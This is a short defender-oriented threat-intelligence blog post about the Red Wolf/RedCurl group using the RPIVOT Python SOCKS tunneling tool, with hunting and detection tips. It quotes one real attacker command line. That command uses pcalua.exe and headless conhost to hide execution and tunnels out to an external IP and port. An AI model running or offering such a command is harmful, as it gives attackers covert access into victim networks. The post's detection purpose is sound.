011. Red Wolf Toolset Update

Hello everyone! Adversary toolset is always evolving, and today we'll look at another example demonstrating it.

Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't observed to be used by this activity cluster. I'm talking about RPIVOT - tool written in Python for SOCKS tunneling.


To execute the tool, the adversary used the following command:

pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310

As you can see, we have lots of detection and hunting opportunities:

  • The threat actors abused pcalua.exe using -a parameter for proxy execution.
  • They also leveraged conhost.exe with -c and --headless parameters to hide child process window.
  • The adversary used python.exe to execute a script from suspicious folder - a good hunting candidate.
  • Finally, RPIVOT has lots of command line parameters, which can be used for building detections: --s, --server-ip, --p, --server-port, etc.
Threat actors often update their toolset to bypass you security controls, so make sure you test your detections often enough!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge